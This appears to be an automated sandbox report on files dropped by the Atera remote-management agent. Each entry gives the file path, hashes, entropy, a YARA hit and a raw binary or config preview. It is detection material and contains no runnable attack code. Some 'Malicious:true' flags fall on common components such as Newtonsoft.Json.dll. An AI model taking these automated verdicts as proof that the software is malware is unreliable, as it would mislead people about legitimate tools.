                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):342316
                                                                                                                                                                                                                                        Entropy (8bit):7.999331258360695
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:6144:Ir6VUI82xfkgpWrvL/JVW2L3ukK29GSya5GZ7F2vtVygTNBr6VEZGqTkxU4sAQgY:Ir6+jAfk/rD/J3Lun8EaekVcgTzr6GZR
                                                                                                                                                                                                                                        MD5:09447F135F7F4486C165061CF443C569
                                                                                                                                                                                                                                        SHA1:3AD4264DB3112F845D35C112AABEA9CBB2E21AFA
                                                                                                                                                                                                                                        SHA-256:0142E2CA4F93C9631591065DC53944A86E4B961620F4FAF1FE8B61A8B2867C9B
                                                                                                                                                                                                                                        SHA-512:BE678FB5CA389198A5CC474C8E9E9D0C79A92A582CB81325B13D8BE226725AD04FAA6ECC3B4B7CECAEDAA6F15EC13F01C0276100EE19FAAF0A1B1DD7D061F31B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....#D.Y.V.:........-...AgentPackageSTRemote/AgentPackageSTRemote.exe....(........m......~.;8w.8...N.....]..z..1.o.?.............b...T..*.....W......v....,.3.<~.@.U...F]....oCo..a..dR......Q.+.Q+.#B..7.\.@.>o.;..J7wd........H...m.G/.^Y..2..u.._.b.0.%T.U....,^........W.....MS.+...;..N..63d..m.0w._`V.J.t..g.x....?f=...81}j.SS.....*.z..M. ......=Y].yD.<..S..,.{..x&@g.&.}...A...y..<z`.Z.a.>H.......wo.k..]9.9..-.YvL..FhQ..P]..1.+~d.....'9...4O?.$h.....2.`..G....2T<..(.t..q.W#..]C.6/a...o....Q......c...X.....]q..U.%.....8...~..k....~.b...c3ob(G.&.S..8g.x.vO.Cz.yk.p5....i..-=.p...=^...wg.....N...R...TL..... ..uP...Q...... ..5....u..Ydn...RW..w.;).n.v.......WA.Q.........2....,Z....T..P..."....[h......~}..N.k...].6..M..|.......To.......'..Q...&.y.........v...OK8.e^..%>.e..B1:7.#..(..........;...79|.....n..u.,..[....#Q..........{...T...i..H....1.8.....S..|__....^Cu...*....M..T....r..._G,....H....T=..?3.X..{.5..".0(6...\V...p!..1..S...d

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):72744
                                                                                                                                                                                                                                        Entropy (8bit):5.510938920637226
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:r8V3tfciq9s2k7Xvpci+yLYCJoUu7Q6P+O76q:klPna02B86P+ON
                                                                                                                                                                                                                                        MD5:67FEF41237025021CD4F792E8C24E95A
                                                                                                                                                                                                                                        SHA1:C47A5A33F182C8244798819E2DC5A908D51703E8
                                                                                                                                                                                                                                        SHA-256:C936879FBB1AA6D51FE1CDC0E351F933F835C0BF0E30AEF99A4E19A07A920029
                                                                                                                                                                                                                                        SHA-512:232015FE6BEE6637D915648A256474FC3DF79415AC90BABDFC2E3DED06C2F36FCE85573EC7670F2A05126AA5F24A570B36885E386061666D9EAA1F0DA67A093E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B.Pg.........."...0.................. ... ....@.. .......................`............`.....................................O.... ..P...............((...@....................................................... ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H........B...............................................................0..........(....9....(....~<...%-.&~;.....t...s....%.<...(...+~=...%-.&~;.....u...s....%.=...(...+~>...%-.&~;.....v...s....%.>...(...+~?...%-.&~;.....w...s....%.?...(...+*.*..(....*...0..-.......(.....3..*r...pr...p(....,.(......(....+..._*....0..(........(......~....(....,..*..(....~....(....*.0.......... ....(......i./.*...............&.........4...%.. ..o.......r9..p( ...,.*......s!.....s!............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):541
                                                                                                                                                                                                                                        Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                        SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                        SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                        SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXRLW:WBRi
                                                                                                                                                                                                                                        MD5:B22628235C1F44AE054091C8FDC82D23
                                                                                                                                                                                                                                        SHA1:70C8E5ABD9D2D8A18B769F6E71819FB53B273B9B
                                                                                                                                                                                                                                        SHA-256:B31673E38897D5D84558E2745D02C553649A50063A9F0E7DE7E71BBA89916232
                                                                                                                                                                                                                                        SHA-512:C1097690938F3EDCBA20802DFB77880FB29D1F8B70C62FA76D1828613D57355FD04C0B3D26DA90128DB2DF2E63E4E30C8E195B84452C0931B8CB2F043D5BBA98
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=24.3

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96808
                                                                                                                                                                                                                                        Entropy (8bit):6.179705686579105
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:FJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvO1762s:FQUm2H5KTfOLgxFJjE50vksVUfPvO1m
                                                                                                                                                                                                                                        MD5:C548EA0CD65F5981C2DF82A0177A9D3A
                                                                                                                                                                                                                                        SHA1:5D082BC6BC2D1F2267AE8525F3A528A0B58C3161
                                                                                                                                                                                                                                        SHA-256:BEAFAA0CF51CE914B58482094044A6CC742C3269431A812D5683CA3034ACCD84
                                                                                                                                                                                                                                        SHA-512:530AE2069185897612E0129135065954379F75F6C9F9DAEE3F7D9DFE49C7CEAFC8807DC866591F39337410FAFA76733705C316912F3A12AE85565ECB775476F4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ..............................;.....`.................................(f..O.......8............R..((...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710184
                                                                                                                                                                                                                                        Entropy (8bit):5.960555604702895
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:UBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTU4:UBjk38WuBcAbwoA/BkjSHXP36RMGN
                                                                                                                                                                                                                                        MD5:1792F462B4908235FBA6B3B4B2203276
                                                                                                                                                                                                                                        SHA1:E1B0CF8559C330377E2DE7FEE9FCC0FC3D34566A
                                                                                                                                                                                                                                        SHA-256:8CA1C3651A6F118C80E712BCB9C44031EB3D8C7180A60EDA5F2B24A0584082A9
                                                                                                                                                                                                                                        SHA-512:7AB9E256A4359A5560BD8C10014591F350F2788F72693234C16AA0B75F95F9EE3CF5E219B97A33944A5E730202BD355064885FD060812EE150107FFC84C92F65
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ............`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\attendance-updated-time.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18
                                                                                                                                                                                                                                        Entropy (8bit):3.197159723424149
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WiW7lwn:W15wn
                                                                                                                                                                                                                                        MD5:86D8E89B2E66CF24A028619220D39A52
                                                                                                                                                                                                                                        SHA1:40762B63363E107AD2DF71EEE3B77E6CBA6FA896
                                                                                                                                                                                                                                        SHA-256:D0228B536DE424B0F6BD2E51611FBA53F8B683CD4A326C758000AD01DB84A6C7
                                                                                                                                                                                                                                        SHA-512:79F946E982A4D4E24C6823F83AAC8D66BF08DE81615B3E3F366DC8879778FB14CBD81C51134B8310576EED716BBE2B8CA02DCC6681AD5A00484DE26F8B92CAAB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:638700363578591452

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1560
                                                                                                                                                                                                                                        Entropy (8bit):5.058600146855146
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:D1Q0/bqd+sVNPBeiQ0/bqd+sVNPBtQ0/bqd+sVNPBdtEK:DaUbgd5BaUbgd5BiUbgd5Bdt9
                                                                                                                                                                                                                                        MD5:E74BEC0087C0B84BED80E067F4DD544D
                                                                                                                                                                                                                                        SHA1:542D1BBFFD99B2C3DFC093097AECCCE6B2155C1E
                                                                                                                                                                                                                                        SHA-256:228DA34A31A3A434592CF09061B6C90488E44659444D573FB0D5BCAA82052BCC
                                                                                                                                                                                                                                        SHA-512:4EE13EC13F7EB675AE7503529D1934492C5A9D6A442CC6371FA7970EEDA2A8FFF984C380D2E15358DF103C062D104C20884383E43792ED7A88AE09E8F0BEB41E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..17/12/2024 12:45:57 Failed to set key: RequestPermissionOption with value: ..Exception: System.ArgumentNullException: Value cannot be null...Parameter name: value.. at System.ThrowHelper.ThrowArgumentNullException(ExceptionArgument argument).. at Microsoft.Win32.RegistryKey.SetValue(String name, Object value, RegistryValueKind valueKind).. at AgentPackageSTRemote.Persistence.AteraSettings.WindowsAteraSplashtopRegistry.SetValue(String key, Object value, SettingKeyType settingKeyType)..17/12/2024 12:45:57 Failed to set key: RequirePasswordOption with value: ..Exception: System.ArgumentNullException: Value cannot be null...Parameter name: value.. at System.ThrowHelper.ThrowArgumentNullException(ExceptionArgument argument).. at Microsoft.Win32.RegistryKey.SetValue(String name, Object value, RegistryValueKind valueKind).. at AgentPackageSTRemote.Persistence.AteraSettings.WindowsAteraSplashtopRegistry.SetValue(String key, Object value, SettingKeyType settingKeyType)..17/12/2024

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):687097
                                                                                                                                                                                                                                        Entropy (8bit):7.999301462450433
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:/RXzKywF1eMeWoENSWdoY5RI+L77Abu6o9atsrK/4WUHkei7aMpOIlv2H:hzKP9oISAoYrI677AK62aGWZ7FpOIK
                                                                                                                                                                                                                                        MD5:15BE7A1225D2015FDE97B5C2BF27569E
                                                                                                                                                                                                                                        SHA1:EC3041B31C796EED9E6AC6E565FED3B5068F198A
                                                                                                                                                                                                                                        SHA-256:686058C3A01FE67FC0CB8D1E66535CFAFCFDE584D07781FEB1461618826364CA
                                                                                                                                                                                                                                        SHA-512:02B6307FDDF2D4F22567C5C7749B9ECF5BA124057360494A545BC02871558CB6FAC0224598C43E76F683C4A3C9126D62096E04D53769ADCA75DAD0416137CE85
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-......@.Y..IV........3...AgentPackageSystemTools/AgentPackageSystemTools.exe....(........j.......)..%.....Y...U..j..a.y."Dr+xC:.p...&.v..3.1/.p..{h.`B........z.W).*....s...........5.4...B..Oi}...?+Y.....*...........RO..O..'..k...<...]D..Q;M&c...>-...#F..l.....U E}......Z~y...VYc..C.......i3..O..`..}....t~...AX....Z.....4.@...'..M3.B..>Q2B...-<... }.Q....X....|..=.........Q5..6...`..;..>}..8...g..@..-4.._w.W...o.D.Il.z?.&.. .\z..v....:.....w.$G.C.G.M.fN..1`W&...zM........8m.4...R4a.+..ZS./w.Jy.Z..*.bj1.gV.[.b.,....,(oT.uY..M6~.F..O$.>.M4.....oC..uP.K*.r.C..L5@i4..NT..\{. .....).{.~........u.....V.D....~....\.UL..........^...5...MD....2.On.a-.i........X...O..#V.X.2..$.....x^[.h.b...&p.....JN..,S4O.g.n2e....*.u...".E.W..-Tc.....b....=.@...}.V....6{I....N.s.j..1.X[...`s..6^...'..jI......h...J.60.6A..#U.w._[.Q.o..^...m09A.. :.B.C>"K j.1y.>.b....b...I... ..H.H..........4..q.{.....M.D.R2..|..J.Y#.1.xIZ.u.."....,.y?h.H...0.[.y......&}.|..m..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51752
                                                                                                                                                                                                                                        Entropy (8bit):6.286030081106931
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:esXr7JfmSn0jVGcxf3KI3NjkfE53Tnz8ztFeDZUBEpYi60Cc:eOFnarB3NwfE5Dz8LEZUq76Fc
                                                                                                                                                                                                                                        MD5:6BC1A40E1C27E34FB38B1E646AAF7EE2
                                                                                                                                                                                                                                        SHA1:2B35EACC9498AB06AB46B0EB13B1F1846CF96ADC
                                                                                                                                                                                                                                        SHA-256:372204BEB17F9AF59A26C1F1CECCF313C30ACC7466F1B29B4112430BCCF48E84
                                                                                                                                                                                                                                        SHA-512:C04D75AD9F68FC669F99C35B053E74FDB9383DB6C9042619420DAD5919EC63819E7073803E072ED8B5B41CE0454A7C5BE3D81A40EBD3FCF3B073333E8BDD31E6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.Zg.........."...0.............^.... ........@.. ..............................(.....`.....................................O.......`...............((........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...`...........................@..@.reloc..............................@..B................@.......H........C...r...........................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o......s....%.o........o......s...........s....%......io....%o......o........o ...o .....(!...*..0..........r...p... .....r...p.(.....o......(.....o.......("..........s......[o......s....%.o........o#.......s$..........s.......i.J.....%......io%.......o ...o ...(.........o&...*..('...*...0..].........~(....~(....~(........

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):923
                                                                                                                                                                                                                                        Entropy (8bit):5.156246271896278
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:Jds4F7k1hOXrRT2/2E10PT2/+w0E1UrPT2/+7Trln:3ss757Rkqk+wik+7Nn
                                                                                                                                                                                                                                        MD5:D6FCBCF9C6ABC2F051772E7A7D5EDFD5
                                                                                                                                                                                                                                        SHA1:33D9962BCC42F021A7CEADF3D1C613B4643C66F6
                                                                                                                                                                                                                                        SHA-256:F523D40AE141AA8899B053D77117FCF50639708757AD4A050F3A11E8582A894A
                                                                                                                                                                                                                                        SHA-512:07DA40F1C43A1E35582ADE5DBBAEB47EC2922C42241BD4B950EFA76407597CF838338E27F3F5197E02F5209B27542207BEDBA9B85681955E3C326C95C1F5AC22
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />...</startup>...<runtime>....<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.....<dependentAssembly>......<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.....</dependentAssembly>.....<dependentAssembly>......<assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.....</dependentAssembly>.....<dependentAssembly>......<assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.....</dependentAssembly>....</assemblyBinding>...</runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                        Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXSgUn:WBZU
                                                                                                                                                                                                                                        MD5:A68FD83B6812524BA659708B5323738E
                                                                                                                                                                                                                                        SHA1:4898AF8DDD48B89B6D0F57D08C795E477D9FBA49
                                                                                                                                                                                                                                        SHA-256:358327E0D5BF2182C61872CE9282B4257E4A2B0540D17DAA4555FA679A229B1D
                                                                                                                                                                                                                                        SHA-512:9E4B73DB126562F7A84A8FB8EC2A1654E9CD8DB6236305DC5E64F445B266545A6AA506D8C37161577AD780538697F29A96CBA3CBCC4EFD05B7BF47A1F140573B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=27.11

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.Mutex.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):14888
                                                                                                                                                                                                                                        Entropy (8bit):6.879305102210371
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:fC9aM0P8P2Nyby2sE9jBF6IYiYF85S35IVnxGUHFi3oCj:fC9abP8ONyb8E9VF6IYijSJIVxu9j
                                                                                                                                                                                                                                        MD5:B8414539AA307D28D54BA4DA49BAA62F
                                                                                                                                                                                                                                        SHA1:94ECC4FD997802F9DF2EE0A09185454FC072D065
                                                                                                                                                                                                                                        SHA-256:0362F585CBDF093BEA16AB56C55DF1784610EAD257BBCD4D2EB4D1DB38014627
                                                                                                                                                                                                                                        SHA-512:96CEC5DF1F3CA6ADF9B5C57893029DA46E082C9E797F7D5D369F5349412DF96F6E11084A265E7FF774BF83D537DF7C4F5AC9DF4B071EFF8012B27351D55340F9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............'... ...@....... ..............................#p....`..................................'..O....@..L...............((...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......................@..B.................'......H........ ..............................................................R.(.......s....}....*2.{....o....*6.{.....o....*BSJB............v4.0.30319......l.......#~..p...l...#Strings............#US.........#GUID...........#Blob...........W..........3..................................................................8.....@...........k.g.................................T...........].V.....V...................A.!...........H.!.1.....!.c.).........V.............8.....P ............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):112680
                                                                                                                                                                                                                                        Entropy (8bit):6.177500062233969
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:+tsGQngrGJbFzosIehOKHbeqRMFOblTQFHRbd6U/pC18VdUEvfkAS77S76iy:+6fBzoWtRMFOODbd6U/Y18hK77Spy
                                                                                                                                                                                                                                        MD5:6970C828E51DC263F4F14CFC9303003B
                                                                                                                                                                                                                                        SHA1:0243FF899BE76A2319521AAE08D35A1737EFF21A
                                                                                                                                                                                                                                        SHA-256:321F4FFC7E16A3B6A699F891730F5862C0933009BE5D84E510871791F15430C4
                                                                                                                                                                                                                                        SHA-512:198D41EA1CD366F9387CC7A8DBC6BFB8171845168B2120989E09E11407FCE1A7FC1B2E297105876424A3B3D380FC5B44C46ACF931DD13EB0D3A18CF1ACF821A8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.Yg.........." ..0.................. ........... ..............................c.....`.....................................O.......8...............((..........|................................................ ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B.......................H...........t"...........................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p( ...r...p(!.........("...(#.....&..*........00......:.(......}....*..0..Z............($...,......(%...*~..........(&........($...-..(....s'...........,..((.........(%...*..........&E.......0..G........{....,.(......5~)...r'..po*...rm..pr...po+...td...r...p(,..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\CredentialManagement.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):38952
                                                                                                                                                                                                                                        Entropy (8bit):6.309788080581439
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:fINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgy:ANsii6v/HS0+OJd5gpKm76tgy
                                                                                                                                                                                                                                        MD5:4FFD20EBA9EAE8A4D71A4CCD589E39CF
                                                                                                                                                                                                                                        SHA1:D0199278A626E9D295072FA5A8582A15C7583C55
